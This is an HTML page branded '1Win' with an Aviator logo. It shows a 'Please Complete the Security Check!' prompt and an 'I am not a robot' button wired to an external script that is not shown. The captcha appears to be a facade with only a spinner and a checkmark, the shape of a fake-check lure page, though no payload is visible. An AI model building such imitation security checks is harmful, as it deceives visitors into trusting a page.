<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>1Win </title>
    <link rel="stylesheet" href="css/onewinxyz.netlify.app-styles.css">
</head>

<body>
    <div class="container">
        <div class="content">
            <img src="images/fi-1win.png" alt="Aviator Logo" class="logo">
            <h1>1WIN</h1>
            <p>One More Step...<br>Please Complete the Security Check!</p>
            <div class="captcha-container">
                <button class="cta-button" onclick="startCaptcha()">I am not a robot</button>
                <div class="captcha-verification">
                    <div class="loading-spinner" id="loading-spinner"></div>
                    <div class="checkmark" id="checkmark">
                        <svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 52 52">
                            <path class="checkmark__check" fill="none" d="M14 27l8 8 16-16"></path>
                        </svg>
                    </div>
                </div>
                <p id="success-message" class="success-message"></p>
            </div>
        </div>
    </div>

    <script src="js/.-289-script.js"></script>
</body>

</html>
